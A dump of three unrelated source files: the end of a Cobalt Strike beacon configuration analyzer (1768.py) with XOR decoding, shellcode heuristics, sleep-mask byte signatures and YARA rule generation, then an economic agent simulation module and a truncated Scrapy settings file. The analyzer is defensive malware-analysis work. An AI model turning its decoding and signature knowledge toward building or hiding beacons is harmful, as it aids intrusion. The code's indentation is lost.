decodedStart = XORChain(xorKey, bytesValues[formatLength:])
if StripLeadingNOPs(decodedStart)[0:2] == b'MZ':
decodedData = StripLeadingNOPs(XORChain(xorKey, data[iIter + formatLength:iIter + formatLength + decodedLength]))
if DetectPEFile(decodedData):
return decodedData, ['xorkey(chain): 0x%08x' % xorKey, 'length: 0x%08x' % decodedLength]
if b'MZRE' in decodedStart or b'MZAR' in decodedStart:
decodedData = XORChain(xorKey, data[iIter + formatLength:iIter + formatLength + decodedLength])
if START_CONFIG_I in decodedData or START_CONFIG_DOT in decodedData:
return decodedData, ['xorkey(chain): 0x%08x' % xorKey, 'length: 0x%08x' % decodedLength]
return data, []
def TryExtractDecode(data):
if DetectPEFile(data):
return data, []
extracted = StripLeadingNOPs(data)
if DetectPEFile(extracted):
return extracted, ['leading NOPs: 0x%04x' % (len(data) - len(extracted))]
extracted, messages = TryXORChainDecoding(data)
if DetectPEFile(extracted):
return extracted, messages
if START_CONFIG_I in extracted or START_CONFIG_DOT in extracted:
return extracted, messages
return data, []
def TestShellcodeHeuristic(data):
return b'hwini' in data[:0x1000] or b'hws2_' in data[:0x1000] or (data[0:1] == b'\xFC' and len(data) < 0x1000)
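# FinalTests searches the data for known Cobalt Strike byte signatures (sleep mask
# deobfuscation routines and the public key config entry), also in XOR-encoded form, and
# reports each hit together with the longest string found in front of it (LSFIF).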
def FinalTests(data, options, oOutput):
dSignatures = {
# https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures
'Sleep mask 64-bit 4.2 deobfuscation routine': b'\x4C\x8B\x53\x08\x45\x8B\x0A\x45\x8B\x5A\x04\x4D\x8D\x52\x08\x45\x85\xC9\x75\x05\x45\x85\xDB\x74\x33\x45\x3B\xCB\x73\xE6\x49\x8B\xF9\x4C\x8B\x03',
'Sleep mask 32-bit 4.2 deobfuscation routine': b'\x8B\x46\x04\x8B\x08\x8B\x50\x04\x83\xC0\x08\x89\x55\x08\x89\x45\x0C\x85\xC9\x75\x04\x85\xD2\x74\x23\x3B\xCA\x73\xE6\x8B\x06\x8D\x3C\x08\x33\xD2',
'Public key config entry': b'\x00\x07\x00\x03\x01\x00\x30\x81\x9F\x30\x0D\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x01\x01\x05\x00\x03\x81\x8D\x00\x30\x81\x89\x02\x81',
}
for name, signature in dSignatures.items():
xorKeys = [b'\x00']
if name == 'Public key config entry':
xorKeys = [b'\x00', b'\x2e', b'\x69']
if options.xorkeys:
xorKeys = [bytes([iter]) for iter in range(256)]
for xorKey in xorKeys:
signatureXored = Xor(signature, xorKey)
for position in FindAll(data, signatureXored):
stringsInFront = sorted(ExtractStringsASCII(data[position-0x100:position]), key=len, reverse=True)
if len(stringsInFront) > 0:
longestString = ' (LSFIF: %s)' % stringsInFront[0]
else:
longestString = ''
oOutput.Line('%s found: 0x%08x%s%s' % (name, position, IFF(xorKey == b'\x00', '', ' (xorKey %s)' % xorKey), longestString))
if options.verbose:
oOutput.Line(cDump(data[position-0x100:position], ' ', position-0x100).HexAsciiDump(rle=True), eol='')
oOutput.Line(' ... signature ...')
oOutput.Line(cDump(data[position+len(signatureXored):position+len(signatureXored)+0x100], ' ', position+len(signatureXored)).HexAsciiDump(rle=True), eol='')
#a# this is a kludge, to fix later when I have time
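# ProcessBinaryFileSub expects the .data section to start with four little-endian 32-bit values
# (payloadType, payloadSize, intxorkey, id2), followed by the payload XOR-encoded with the
# 4-byte key; the decoded payload is then analyzed as an embedded PE file or as shellcode.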
def ProcessBinaryFileSub(sectiondata, data, oOutput, options):
payloadType, payloadSize, intxorkey, id2, sectiondata = Unpack('<IIII', sectiondata)
oOutput.Line('payloadType: 0x%08x' % payloadType)
oOutput.Line('payloadSize: 0x%08x' % payloadSize)
oOutput.Line('intxorkey: 0x%08x' % intxorkey)
oOutput.Line('id2: 0x%08x' % id2)
payload = Xor(sectiondata[:payloadSize], struct.pack('<I', intxorkey))
if payloadSize > len(sectiondata):
oOutput.Line('Error: payload size too large: 0x%08x' % payloadSize)
oOutput.Line('.data section size: 0x%08x' % len(sectiondata))
return False
error, payloadsectiondata = GetDataSection(payload)
if error != None:
positionMZ = payload.find(b'MZ')
if positionMZ != 0:
if START_CONFIG_I in sectiondata or START_CONFIG_DOT in sectiondata or options.xorkeys:
AnalyzeEmbeddedPEFile(data, oOutput, options)
elif TestShellcodeHeuristic(payload):
if IdentifyShellcode(payload) == '':
oOutput.Line('Probably found shellcode:')
else:
oOutput.Line('Found shellcode:')
AnalyzeShellcode(payload, oOutput)
oOutput.Line(cDump(payload).HexAsciiDump(rle=False))
elif positionMZ >= 0 and positionMZ < 0x20:
oOutput.Line('MZ header found position %d' % positionMZ)
AnalyzeEmbeddedPEFile(payload[positionMZ:], oOutput, options)
elif len(payload) == 0:
return False
else:
oOutput.Line('MZ header not found, truncated dump:')
oOutput.Line(cDump(payload[:0x1000]).HexAsciiDump(rle=True))
return False
else:
oOutput.Line('Error: embedded PE file error: %s' % error)
return False
else:
AnalyzeEmbeddedPEFile(payloadsectiondata, oOutput, options)
FinalTests(payload, options, oOutput)
return True
def ProcessBinaryFile(filename, content, cutexpression, flag, oOutput, oLogfile, options):
if content == None:
try:
oBinaryFile = cBinaryFile(filename, C2BIP3(options.password), options.noextraction, options.literalfilenames)
except:
oLogfile.LineError('Opening file %s %s' % (filename, repr(sys.exc_info()[1])))
return
oLogfile.Line('Success', 'Opening file %s' % filename)
try:
data = oBinaryFile.read()
except:
oLogfile.LineError('Reading file %s %s' % (filename, repr(sys.exc_info()[1])))
return
data = CutData(data, cutexpression)[0]
oBinaryFile.close()
oOutput.Line('File: %s%s' % (filename, IFF(oBinaryFile.extracted, ' (extracted)', '')))
else:
data = content
oOutput.Line('File: %s' % (filename))
if options.hash:
oOutput.Line('MD5 : %s' % hashlib.md5(data).hexdigest())
oOutput.Line('SHA1 : %s' % hashlib.sha1(data).hexdigest())
oOutput.Line('SHA256: %s' % hashlib.sha256(data).hexdigest())
try:
# ----- Put your data processing code here -----
data, messages = TryExtractDecode(data)
for message in messages:
oOutput.Line(message)
if data[0:2] == b'MZ' and not options.raw:
extracted, messages = GetXorChainSection(data)
if extracted != None:
resultChain, dJSON = AnalyzeEmbeddedPEFileSub(extracted, options)
if resultChain != [ERROR_NO_CONFIG]:
oOutput.JSON(dJSON)
for message in messages:
oOutput.Line(message)
for message in resultChain:
oOutput.Line(message)
FinalTests(extracted, options, oOutput)
else:
extracted = None
if extracted == None:
error, sectiondata = GetDataSection(data)
if error != None:
oOutput.Line('Error: PE file error: %s' % error)
elif len(sectiondata) < 16:
oOutput.Line('Error: section .data too small: %d' % len(sectiondata))
elif ProcessBinaryFileSub(sectiondata, data, oOutput, options):
pass
else:
bytesToSkip = 0x20
oOutput.Line('Skipping %d bytes' % bytesToSkip)
ProcessBinaryFileSub(sectiondata[bytesToSkip:], data, oOutput, options)
FinalTests(data, options, oOutput)
elif TestShellcodeHeuristic(data):
if IdentifyShellcode(data) == '':
oOutput.Line('Probably found shellcode:')
else:
oOutput.Line('Found shellcode:')
AnalyzeShellcode(data, oOutput)
oOutput.Line(cDump(data).HexAsciiDump(rle=False))
FinalTests(data, options, oOutput)
else:
dConfigs = {}
if options.xorkeys:
xorKeys = range(256)
else:
xorKeys = [0x2E, 0x69]
for xorKey in xorKeys:
xorKeyBytes = bytes([xorKey])
startConfigXored = Xor(START_CONFIG, xorKeyBytes)
for position in FindAll(data, startConfigXored):
result, dJSON = AnalyzeEmbeddedPEFileSub2(Xor(data[position:position+0x10000], xorKeyBytes), [], options)
configSha256 = hashlib.sha256(''.join(result).encode()).hexdigest()
if not configSha256 in dConfigs:
dConfigs[configSha256] = True
if result != [ERROR_SANITY_CHECK]:
oOutput.JSON(dJSON)
oOutput.Line('xorkey %s %02x' % (xorKeyBytes, xorKey))
for line in result:
oOutput.Line(line)
FinalTests(data, options, oOutput)
# ----------------------------------------------
except:
oLogfile.LineError('Processing file %s %s' % (filename, repr(sys.exc_info()[1])))
if not options.ignoreprocessingerrors:
raise
def FormatTime(epoch=None):
if epoch == None:
epoch = time.time()
return '%04d%02d%02d-%02d%02d%02d' % time.localtime(epoch)[0:6]
def SpaceEvery2Characters(string):
result = []
while string != '':
result.append(string[0:2])
string = string[2:]
return ' '.join(result)
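# ProcessLicenseIDs generates YARA rules for the license IDs (watermarks) given with option -l,
# each specified as a number or as name:number; rules are produced for the ID as it appears in
# the config (plain, 'i'-XORed and '.'-XORed) and in shellcode (with and without a leading 0x00).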
def ProcessLicenseIDs(oOutput, oLogfile, options):
rule_config = '''rule cs_%s_licenseid {
meta:
license_name = "%s"
license_id = "%d"
info = "rule generated by 1768.py on %s"
strings:
$a = { %s }
condition:
$a
}
'''
rule_config_i = '''rule cs_%s_licenseid_i {
meta:
license_name = "%s"
license_id = "%d"
info = "rule generated by 1768.py on %s"
strings:
$a = { %s }
condition:
$a
}
'''
rule_config_dot = '''rule cs_%s_licenseid_dot {
meta:
license_name = "%s"
license_id = "%d"
info = "rule generated by 1768.py on %s"
strings:
$a = { %s }
condition:
$a
}
'''
rule_shellcode = '''rule cs_%s_licenseid_shellcode {
meta:
license_name = "%s"
license_id = "%d"
info = "rule generated by 1768.py on %s"
strings:
$a = { %s }
condition:
$a and filesize < 10000
}
'''
rule_shellcode_00 = '''rule cs_%s_licenseid_shellcode_00 {
meta:
license_name = "%s"
license_id = "%d"
info = "rule generated by 1768.py on %s"
strings:
$a = { %s }
condition:
$a and filesize < 10000
}
'''
rule_shellcode_00_end = '''rule cs_%s_licenseid_shellcode_00_end {
meta:
license_name = "%s"
license_id = "%d"
info = "rule generated by 1768.py on %s"
strings:
$a = { %s }
condition:
$a and filesize < 10000 and $a at (filesize - 5)
}
'''
for licenseid in options.licenseids.split(','):
result = licenseid.split(':', 1)
if len(result) == 1:
idInteger = ParseInteger(licenseid)
bytes = struct.pack('>I', idInteger)
idName = binascii.b2a_hex(bytes).decode()
else:
idInteger = ParseInteger(result[1])
bytes = struct.pack('>I', idInteger)
idName = result[0]
prefix = b'\x00\x25\x00\x02\x00\x04'
oOutput.Line(rule_config % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(prefix + bytes).decode())))
oOutput.Line(rule_config_i % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(Xor(prefix + bytes, b'i')).decode())))
oOutput.Line(rule_config_dot % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(Xor(prefix + bytes, b'.')).decode())))
oOutput.Line(rule_shellcode % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(bytes).decode())))
oOutput.Line(rule_shellcode_00 % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(b'\x00' + bytes).decode())))
oOutput.Line(rule_shellcode_00_end % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(b'\x00' + bytes).decode())))
class cOutputJSON(object):
def __init__(self, oOutput, options):
self.oOutput = oOutput
self.options = options
self.messages = []
self.filename = ''
self.JSONs = []
def JSON(self, dJSON):
self.JSONs.append(dJSON)
def Line(self, line, eol='\n'):
if self.options.jsonoutput:
self.messages.append(line)
else:
self.oOutput.Line(line, eol)
def Filename(self, filename, index, total):
self.oOutput.Filename(filename, index, total)
self.filename = filename
class cAPIOptions(object):
def __init__(self):
self.csv = False
self.select = ''
self.ignoreprocessingerrors = False
self.raw = False
self.verbose = False
self.hash = False
self.sanitycheck = False
self.xorkeys = False
class cAPIOutput(object):
def __init__(self):
self.messages = []
self.JSONs = []
def JSON(self, dJSON):
self.JSONs.append(dJSON)
def Line(self, line):
self.messages.append(line)
def LineError(self, line):
pass
def APIAnalyze(data):
oOutput = cAPIOutput()
ProcessBinaryFile('', data, ':', '', oOutput, cAPIOutput(), cAPIOptions())
return oOutput.JSONs
def ProcessBinaryFiles(filenames, oLogfile, options):
oOutput = cOutputJSON(InstantiateCOutput(options), options)
index = 0
if options.jsoninput:
items = CheckJSON(sys.stdin.read())
if items == None:
return
for item in items:
oOutput.Filename(item['name'], index, len(items))
index += 1
ProcessBinaryFile(item['name'], item['content'], '', '', oOutput, oLogfile, options)
if options.jsonoutput:
oOutput.oOutput.Line(json.dumps({'filename': oOutput.filename, 'messages': oOutput.messages, 'config': oOutput.JSONs[0]}))
elif options.licenseids != '':
ProcessLicenseIDs(oOutput, oLogfile, options)
else:
for filename, cutexpression, flag in filenames:
oOutput.Filename(filename, index, len(filenames))
index += 1
ProcessBinaryFile(filename, None, cutexpression, flag, oOutput, oLogfile, options)
if options.jsonoutput:
oOutput.oOutput.Line(json.dumps({'filename': oOutput.filename, 'messages': oOutput.messages, 'config': oOutput.JSONs[0]}))
def Main():
moredesc = '''
Source code put in the public domain by Didier Stevens, no Copyright
Use at your own risk
https://DidierStevens.com'''
oParser = optparse.OptionParser(usage='usage: %prog [options] [[@]file|cut-expression|flag-expression ...]\n' + __description__ + moredesc, version='%prog ' + __version__, epilog='This tool also accepts flag arguments (#f#), read the man page (-m) for more info.')
oParser.add_option('-m', '--man', action='store_true', default=False, help='Print manual')
oParser.add_option('-r', '--raw', action='store_true', default=False, help='Search through the file as a binary file, do not parse as a PE file')
oParser.add_option('-s', '--select', default='', help='Field to select')
oParser.add_option('-S', '--sanitycheck', action='store_true', default=False, help='Exclude configs that do not pass sanity check')
oParser.add_option('-o', '--output', type=str, default='', help='Output to file (# supported)')
oParser.add_option('-l', '--licenseids', default='', help='License ID(s)/Watermark(s) to generate YARA rules for')
oParser.add_option('-c', '--csv', action='store_true', default=False, help='Output config in CSV format')
oParser.add_option('-p', '--password', default='infected', help='The ZIP password to be used (default infected)')
oParser.add_option('-n', '--noextraction', action='store_true', default=False, help='Do not extract from archive file')
oParser.add_option('-H', '--hash', action='store_true', default=False, help='Include hashes of file content')
oParser.add_option('-x', '--xorkeys', action='store_true', default=False, help='Try all single byte XOR keys (not only 0x69 and 0x2e)')
oParser.add_option('--literalfilenames', action='store_true', default=False, help='Do not interpret filenames')
oParser.add_option('--recursedir', action='store_true', default=False, help='Recurse directories (wildcards and here files (@...) allowed)')
oParser.add_option('--checkfilenames', action='store_true', default=False, help='Perform check if files exist prior to file processing')
oParser.add_option('-j', '--jsoninput', action='store_true', default=False, help='Consume JSON from stdin')
oParser.add_option('-J', '--jsonoutput', action='store_true', default=False, help='Output JSON')
oParser.add_option('-V', '--verbose', action='store_true', default=False, help='Verbose output')
oParser.add_option('--logfile', type=str, default='', help='Create logfile with given keyword')
oParser.add_option('--logcomment', type=str, default='', help='A string with comments to be included in the log file')
oParser.add_option('--ignoreprocessingerrors', action='store_true', default=False, help='Ignore errors during file processing')
(options, args) = oParser.parse_args()
if options.man:
oParser.print_help()
PrintManual()
return
if len(args) != 0 and options.jsoninput:
print('Error: option -j can not be used with files')
return
oLogfile = cLogfile(options.logfile, options.logcomment)
oExpandFilenameArguments = cExpandFilenameArguments(args, options.literalfilenames, options.recursedir, options.checkfilenames, '#c#', '#f#')
oLogfile.Line('FilesCount', str(len(oExpandFilenameArguments.Filenames())))
oLogfile.Line('Files', repr(oExpandFilenameArguments.Filenames()))
if oExpandFilenameArguments.warning:
PrintError('\nWarning:')
PrintError(oExpandFilenameArguments.message)
oLogfile.Line('Warning', repr(oExpandFilenameArguments.message))
starttime = time.time()
ProcessBinaryFiles(oExpandFilenameArguments.Filenames(), oLogfile, options)
if options.verbose:
print('Duration: %f' % (time.time() - starttime))
if oLogfile.errors > 0:
PrintError('Number of errors: %d' % oLogfile.errors)
oLogfile.Close()
if __name__ == '__main__':
Main()
| [
"didier.stevens@gmail.com"
] | didier.stevens@gmail.com |
3f39200bc433136f1e88c095425ed4fee9a387cb | e63f9cb17256d0880a3af3241cf41bb894a9014d | /6 objectSwarmObserverAgents_AESOP_turtleLib_NetworkX/oligopoly/oActions.py | 3d05846d5b0c4db8a118fae692484415f2db682c | [
"CC0-1.0"
] | permissive | inknos/SLAPP3 | 2c4e32c7c8592a462d57537472c7150635b60b7c | 56bc323d5e259564961bcfebbcd18069c9bed874 | refs/heads/master | 2020-07-06T10:14:57.030377 | 2019-08-16T15:26:29 | 2019-08-16T15:26:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,434 | py | from Tools import *
from Agent import *
import time
import csv
import graphicDisplayGlobalVarAndFunctions as gvf
import commonVar as common
import pandas as pd
import parameters as par
import numpy as np
# to eliminate an annoying warning at time 1 in time series plot
import warnings
warnings.filterwarnings("ignore", module="matplotlib")
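# actions of the observer: do1b builds the network figure and draws the entrepreneurs-workers
# graph at cycle 1, do2a and do2b ask the agents to report their position, otherSubSteps
# dispatches the named sub-steps of the observer schedule (see also ObserverSwarm.py)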
def do1b(address):
if common.cycle == 1:
# setting Figure for the net
if not common.IPython or common.graphicStatus == "PythonViaTerminal":
# the or is about ipython running in a terminal
            f = gvf.plt.figure(num=2)
mngr1 = gvf.plt.get_current_fig_manager() # NB, after figure()
mngr1.window.wm_geometry("+650+0")
mngr1.set_window_title("Links Entrepreneurs - Workers")
        # build a sorted list of the agent numbers (the map of the agents)
agL = []
for ag in address.modelSwarm.agentList:
agL.append(ag.number)
agL.sort()
# print "\noActions before drawGraph agents", agL
# print "oActions before drawGraph nodes", common.g.nodes()
# basic action to visualize the networkX output
gvf.openClearNetworkXdisplay()
gvf.drawGraph()
def do2a(address, cycle):
self = address # if necessary
# ask each agent, without parameters
print("Time = ", cycle, "ask all agents to report position")
askEachAgentInCollection(
address.modelSwarm.getAgentList(),
Agent.reportPosition)
def do2b(address, cycle):
self = address # if necessary
# ask a single agent, without parameters
print("Time = ", cycle, "ask first agent to report position")
if address.modelSwarm.getAgentList() != []:
askAgent(address.modelSwarm.getAgentList()[0],
Agent.reportPosition)
def otherSubSteps(subStep, address):
if subStep == "pause":
input("Hit enter key to continue")
return True
elif subStep == "collectStructuralData":
collectStructuralData(address.modelSwarm.agentList, common.cycle)
return True
elif subStep == "collectTimeSeries":
collectTimeSeries(address.modelSwarm.agentList, common.cycle)
return True
elif subStep == "visualizePlot":
visualizePlot()
return True
elif subStep == "prune":
common.prune = True
newValue = input(("Prune links with weight < %d\n" +
"Enter to confirm " +
"or introduce a new level: ") %
common.pruneThreshold)
if newValue != "":
common.pruneThreshold = int(newValue)
return True
# this subStep performs only partially the "end" item; the execution
# will continue in ObserverSwarm.py
elif subStep == "end":
if not common.IPython or common.graphicStatus == "PythonViaTerminal":
# the or is about ipython running in a terminal
# += and ; as first character because a first part
# of the string toBeExecuted is already defined in
# commonVar.py
common.toBeExecuted += ";gvf.plt.figure(2);gvf.plt.close()"
else:
return False
# collect Structural Data
def collectStructuralData(aL, t):
# creating the dataframe
try:
common.str_df
except BaseException:
common.str_df = pd.DataFrame(columns=['entrepreneurs', 'workers'])
        print("\nCreation of the structural dataframe\n")
# print common.str_df
nWorkers = 0
nEntrepreneurs = 0
for ag in aL:
if ag.agType == "entrepreneurs":
nEntrepreneurs += 1
if ag.agType == "workers":
nWorkers += 1
# print nEntrepreneurs, nWorkers
str_df2 = pd.DataFrame([[nEntrepreneurs, nWorkers]],
columns=['entrepreneurs', 'workers'])
# print str_df2
common.str_df = common.str_df.append(str_df2, ignore_index=True)
# print common.str_df #warning: here the row index starts from 0
#(correctly in this case, being initial data
# in each period)
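# Added note: DataFrame.append (used just above and again in collectTimeSeries and
# collectModPars below) was deprecated and later removed from pandas. A sketch of the
# equivalent call, assuming the same common.str_df and str_df2 frames, is:
#
#     common.str_df = pd.concat([common.str_df, str_df2], ignore_index=True)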
# collect time series
def collectTimeSeries(aL, t):
# creating the dataframe
try:
common.ts_df
except BaseException:
common.ts_df = pd.DataFrame(
columns=[
'unemployed',
'totalProfit',
'totalProduction',
'plannedProduction',
'consumptionQ',
#'hPriceSd',
'hPSd',
'price',
'wage'])
        print("\nCreation of the time series dataframe\n")
# print common.ts_df
unemployed = 0
for ag in aL:
if not ag.employed:
unemployed += 1
    # hiding the nonexistent mean or sd of prices, in the pre-hayekian period
    # or in the hayekian one if data are too few
# -100 is used in checkHayekianPrices function of WorldState.py
if common.price == -100: common.price=np.nan
hPSd_=common.hPSd
if common.hPSd==-100: hPSd_=np.nan
    # hiding the nonexistent measure of consumption in quantity in the pre-hayekian
    # phase
if common.totalConsumptionInQuantityInA_TimeStep==0:
common.totalConsumptionInQuantityInA_TimeStep=np.nan
ts_df2 = pd.DataFrame([[unemployed,
common.totalProfit,
common.totalProductionInA_TimeStep,
common.totalPlannedProduction,
common.totalConsumptionInQuantityInA_TimeStep,
hPSd_,
common.price,
common.wage]],
columns=['unemployed',
'totalProfit',
'totalProduction',
'plannedProduction',
'consumptionQ',
'hPSd',
'price',
'wage'])
# print ts_df2
# set previous price (t-1)
common.p0 = common.price
common.ts_df = common.ts_df.append(ts_df2, ignore_index=True)
# print common.ts_df #warning: here the row index starts from 0
# graphical function
def visualizePlot():
# Matplotlib colors
# http://matplotlib.org/api/colors_api.html
# html colors
# http://www.w3schools.com/html/html_colornames.asp
if not common.IPython or common.graphicStatus == "PythonViaTerminal":
# the or is about ipython running in a terminal
f= gvf.plt.figure()
mngr2 = gvf.plt.get_current_fig_manager()
mngr2.window.wm_geometry("+0+0")
mngr2.set_window_title("Time series")
params = {'legend.fontsize': 10}
gvf.plt.rcParams.update(params)
common.axPlot = f.gca()
gvf.plt.ion()
if not common.IPython or common.graphicStatus == "PythonViaTerminal":
# the or is about ipython running in a terminal
common.axPlot.cla()
ts_dfOut = common.ts_df
# set index to start from 1
ts_dfOut.index += 1
myPlot = ts_dfOut.plot(
secondary_y=[
#'hPriceSd',
'price',
'wage'],
marker="*",
color=[
"OrangeRed",
"LawnGreen",
"Blue",
"Violet",
"lightblue",
"Pink",
"Gray",
"Brown"],
ax=common.axPlot)
myPlot.set_ylabel(
'unemployed, totalProfit, totalProduction, plannedProduction, consumptionQ, hPSd')
myPlot.right_ax.set_ylabel('price, wage')
myPlot.legend(loc='upper left')
myPlot.axes.right_ax.legend(loc='lower right')
gvf.plt.pause(0.01)
if common.IPython and not common.graphicStatus == "PythonViaTerminal":
# the and not is about ipython running in a terminal
f2 = gvf.plt.figure()
myax = f2.gca()
# myax.set_autoscale_on(True)
gvf.plt.title('Time Series')
ts_dfOut = common.ts_df
# set index to start from 1
ts_dfOut.index += 1
myPlot = ts_dfOut.plot(
secondary_y=[
#'hPriceSd',
'price',
'wage'],
marker="*",
color=[
"OrangeRed",
"LawnGreen",
"Blue",
"Violet",
"lightblue",
"Pink",
"Gray",
"Brown"],
ax=myax)
myPlot.set_ylabel(
'unemployed, totalProfit, totalProduction, plannedProduction, consumptionQ, hPSd')
myPlot.right_ax.set_ylabel('price, wage')
myPlot.legend(loc='upper left')
myPlot.axes.right_ax.legend(loc='lower right')
#if not common.IPython or common.graphicStatus == "PythonViaTerminal":
# the or is about ipython running in a terminal
#gvf.plt.figure(1)
# gvf.plt.show()
# gvf.plt.pause(0.01) #to display the sequence
if common.IPython and not common.graphicStatus == "PythonViaTerminal":
# the and not is about ipython running in a terminal
gvf.plt.show()
# saving time data via toBeExecuted in commonVar.py
def saveData():
if common.fgIn!=None: common.fgIn.close()
if common.fgOu!=None: common.fgOu.close()
# used in myGauss.py
# using methodProbs which is a dictionary generated by SLAPP
par.dataFrameAppend("notExisting",\
"from schedule.xls: work trouble probability",
common.methodProbs['workTroubles'])
tt = time.strftime("%Y%m%d_%H-%M-%S")
fileName = tt + "_par.csv"
csvfile = open(common.pro + "/" + fileName, "w")
common.par_df.to_csv(csvfile, index_label=False, index=False)
csvfile.close()
fileName = tt + "_ts.csv"
csvfile = open(common.pro + "/" + fileName, "w")
common.ts_df.to_csv(csvfile, index_label=False, index=False)
csvfile.close()
fileName = tt + "_str.csv"
csvfile = open(common.pro + "/" + fileName, "w")
common.str_df.to_csv(csvfile, index_label=False, index=False)
csvfile.close()
fileName = tt + "_firms.csv"
csvfile = open(common.pro + "/" + fileName, "w")
common.firm_df.to_csv(csvfile, index_label=False, index=False)
csvfile.close()
# the common.modPars_df can be missing
try:
common.modPars_df
fileName = tt + "_modPars.csv"
csvfile = open(common.pro + "/" + fileName, "w")
common.modPars_df.to_csv(csvfile, index_label=False, index=False)
print("Five files with date and hour", tt, "written in oligopoly folder.")
except BaseException:
print("Four files with date and hour", tt, "written in oligopoly folder.")
# special action code, to be activated if the time
# (cycle) is equal to ...
#
def makeSpecialAction():
if common.cycle == 1:
files=os.listdir(common.pro)
if "modPars.txt" in files:
common.file_modPars=True
print("The special action has to be activated at cycle ... ")
common.activationCycle = int(input("-1 if never "))
else:
print("\nWarning: no file 'modPars.txt', the specialAction "+\
"item has no effect.\n\n")
if common.file_modPars and common.cycle == common.activationCycle:
print("\n***Special action at time =", common.cycle)
print("***Modification of the following parameters\n")
common.nameValues={}
fIn=open(common.pro+"/modPars.txt","r")
for line in fIn:
line=line.replace('\t',' ')
lineS=line.split() #one or more spaces as a delimiter
n=lineS[0]
if n=="mySeed" or n=="projectVersion" or n=="build" \
or n=="notExisting" or n=="nCycles":
print("Impossible to modify the '"+n+"' parameter in this way.")
print("Program exiting.")
os.sys.exit(1)
try: v=int(lineS[1])
except:
try: v=float(lineS[1])
except: v=lineS[1]
if common.check(n)[0]:
print('existing parameter '+n+', former value',\
common.check(n)[1], ' new value ', v,'\n')
collectModPars(n,common.check(n)[1],v)
else:
print('added parameter '+n+', value ', v,'\n')
collectModPars(n,np.NaN,v)
common.nameValues[n]=v
fIn.close()
common.setVar()
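# Added note: a hypothetical example of the modPars.txt file parsed above. Each line is
# "<parameterName> <value>" separated by spaces or tabs; the names mySeed, projectVersion,
# build, notExisting and nCycles are rejected. The names below are invented placeholders,
# not actual parameters of this model:
#
#     someParameter 1.2
#     anotherParameter newLabel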
# collect modified parameters
def collectModPars(parName, previousValue, newValue):
# creating the dataframe
try:
common.modPars_df
except BaseException:
common.modPars_df = pd.DataFrame(columns=[\
"Parameter internal names",\
"Parameter definitions", \
"previousValue","newValue"])
print("Creation of the modified parameter database\n")
# print common.modPars_df
# recording the modification cycle
modPars_df2 = pd.DataFrame([\
["NaN","Modifications at time = "+str(common.activationCycle), \
np.NaN, np.NaN]], columns=[\
"Parameter internal names",\
"Parameter definitions", \
"previousValue","newValue"])
common.modPars_df = common.modPars_df.append(modPars_df2, \
ignore_index=True)
# regular data recording
modPars_df2 = pd.DataFrame([[parName, common.parsDict[parName],
previousValue, newValue]],
columns=["Parameter internal names",\
"Parameter definitions", \
"previousValue","newValue"])
common.modPars_df = common.modPars_df.append(modPars_df2, \
ignore_index=True)
#print (common.modPars_df)
| [
"pietro.terna@unito.it"
] | pietro.terna@unito.it |
659c0e4c93ee4769fb51fced1af73af43dd0d449 | 15f953a10339be3accb3240e0a6dc414adaeecbf | /ereading/settings.py | c2096454d1b8b702f0c8beae0ddda8220e5f69c4 | [] | no_license | denolehov/scrapy-ereading | 7a4f9c8b2e66f7a83b4972ff6a7923142ffa95fb | d6be926011831eb90cbd38e39f3321ffed3b55cb | refs/heads/master | 2021-05-28T23:27:26.669462 | 2015-08-29T20:06:16 | 2015-08-29T20:06:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,094 | py | # -*- coding: utf-8 -*-
# Scrapy settings for ereading project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'ereading'
SPIDER_MODULES = ['ereading.spiders']
NEWSPIDER_MODULE = 'ereading.spiders'
ITEM_PIPELINES = {
'ereading.pipelines.BookPipeline': 1,
}
# Crawl responsibly by identifying yourself (and your website) on the user-agent
# USER_AGENT = 'ereading (+http://www.yourdomain.com)'
# Configure maximum concurrent requests performed by Scrapy (default: 16)
# CONCURRENT_REQUESTS=32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
# DOWNLOAD_DELAY=3
# The download delay setting will honor only one of:
# CONCURRENT_REQUESTS_PER_DOMAIN=16
# CONCURRENT_REQUESTS_PER_IP=16
# Disable cookies (enabled by default)
# COOKIES_ENABLED=False
# Disable Telnet Console (enabled by default)
# TELNETCONSOLE_ENABLED=False
# Override the default request headers:
# DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
# }
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
# SPIDER_MIDDLEWARES = {
# 'ereading.middlewares.MyCustomSpiderMiddleware': 543,
# }
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# DOWNLOADER_MIDDLEWARES = {
# 'ereading.middlewares.MyCustomDownloaderMiddleware': 543,
# }
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
# EXTENSIONS = {
# 'scrapy.telnet.TelnetConsole': None,
# }
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
# ITEM_PIPELINES = {
# 'ereading.pipelines.SomePipeline': 300,
# }
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
# NOTE: AutoThrottle will honour the standard settings for concurrency and delay
# AUTOTHROTTLE_ENABLED=True
# The initial download delay
# AUTOTHROTTLE_START_DELAY=5
# The maximum download delay to be set in case of high latencies
# AUTOTHROTTLE_MAX_DELAY=60
# Enable showing throttling stats for every response received:
